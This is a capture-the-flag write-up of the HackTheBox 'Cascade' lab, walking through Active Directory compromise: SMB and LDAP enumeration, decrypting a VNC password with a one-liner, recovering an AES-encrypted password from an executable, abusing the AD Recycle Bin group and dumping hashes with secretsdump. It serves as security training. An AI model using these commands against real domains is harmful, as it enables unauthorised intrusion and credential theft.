CTF-Writeups/HackTheBox/Cascade.md

HackTheBox-Cascade

NMAP

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:            
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-26 11:29:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn  
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?                                          
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-26T11:30:38
|_  start_date: 2021-12-26T11:26:31 

PORT 139/445 (SMB)

We can try to see if there's null authentication on smb to see if we can list and access shares

Trying enum4linux-ng that would try to list usernames from RPC (Remote Procedure Call) using null authentication

This could also be doing from windapsearch which is written in golang

So we pretty much get the same results , let's use grep and awk to filter out usernames and save them in a file

/opt/windap/windapsearch-linux-amd64 -d cascade.local -m users | grep sAMAccountName | awk -F:' ' {'print $2'}

Using kerbrute to see which ones are valid usernames and out of 15 users we get 11 users that are valid

Kerbrute does check for Pre-authenitcation disabled but just to be sure I used impacket's GetNPUsers script

So I went on using ldapsearch to see if I can get some information out of users's properites like the last password being set or can be find the plain text passwords

ldapsearch -x -LLL -h 10.10.10.182 -D 'cn=USER,ou=users,dc=cascade,dc=local' -b "dc=cascade,dc=local" 

This shows us a ton of information but we can see the results in a file and use grep to filter our search

cat ldap_info | grep cascade

I then just grep for cascade and found a base64 encoded text in a cascadeLegacyPwd field under r.thompson user

On decoding the base64 text we can get a clear text , maybe this could be his password , so to verify it we can use kerbrute's passwordspray

But we can only login to smb

Having user credentials we can try to list any accounts that are associated with a SPN in but there weren't any accounts like that

In the smb share we do we have some files that we can access

I decided to come back at these shares and first enumrate the AD through python bloodhound-injestor

python3 /opt/Python-Bloodhound/bloodhound.py -d cascade.local -u 'r.thompson' -p 'rY4n5eva' -c all -ns 10.10.10.182

After getting those json file we need to import them to bloodhound GUI

But I didn't find anything that we can do with this user

All we can gather was that r.thompson is a memeber of IT group

So going back to smb shares we see a folder named IT in Data share

I downloaded every file I could find from this directory

Looking at the html file and I didn't get anything juicy

So this was what we could gather as r.thompson, looking at VNC install.reg file there was a password in hex

Looking at this article it seems that we can get the plain text password

https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/

I found a one liner for this to decrypt the vnc hex password to get plain text

echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

And with this we got smith's passsword

Verifiying with crackmapexec to see if we can get a shelll through winrm

We can now use evil-winrm to get a shell as s.smith user

After gettting a shell one thing note is that this user is in Audit Share group and back when we listed the shares there was a share named Audit$ but we weren't able to access it but now we can

Grabbing the Audit.db file we need to open this with DB Browser For SQLite which we can install it on ubuntu (it's available by default on kali linux)

Here we can see the table names and the fields , to view the data in these table switch to Browse Data

DeletedUserAudit doesn't have anything here, switch the table to Ldap we see the same username that was in that html file and it's password which is encrpyted

From here we can't move forward only through using linux as we need to analyze the dll and the executable which can only be done through windows only (regretting for using dual boot )

So after switching to windows and downloading dnspy to analyze executables and dll files I was able to retrieve two strings , one was an ecrypted string and the other was the IV key

Opening the exe , we can navgiate to main module and see the secret key to decrypt the base64 string we already got from the db file

Further more , opening the dll file , we can find IV key and see that it's using CBC mode encryption

I visited this site https://www.devglan.com/online-tools/aes-encryption-decryption as when trying on cyberchef I didn't understand what format I needed to specify as I was having difficulty in specifying the ouput to be in base64 so that site gave me the option clearly

And now all that is left is to decode this text from base64

Using kerbrute again to check which user does this password belong to (although it's very clear but doing it anyways )

Logging with this user , we can see that we are in AD Recycle bin group

Now looking back at the meeting note , I understood what it meant , being in this group we need to recover the deleted object so when we get the password of TempAdmin we get the password for the Administrator account

Searching for abusing this group , I found that we can read about deleted AD objects using AD management powershell module , so downloading the AD module from here

https://github.com/samratashok/ADModule

After listing deleted objects we can see again cascadelegacypwd field which will show base64 encoded password

Now the moment of truth, according to meeting notes we should be able to login as administrator account with this password

Further we can dump hashes using impacket's secretsdump.py

References

• https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/
• https://github.com/billchaison/VNCDecrypt
• https://linuxhint.com/install-sqlite-browser-ubuntu/
• https://github.com/dnSpy/dnSpy
• https://www.devglan.com/online-tools/aes-encryption-decryption
• https://github.com/samratashok/ADModule
• https://book.hacktricks.xyz/windows/active-directory-methodology/privileged-accounts-and-token-privileges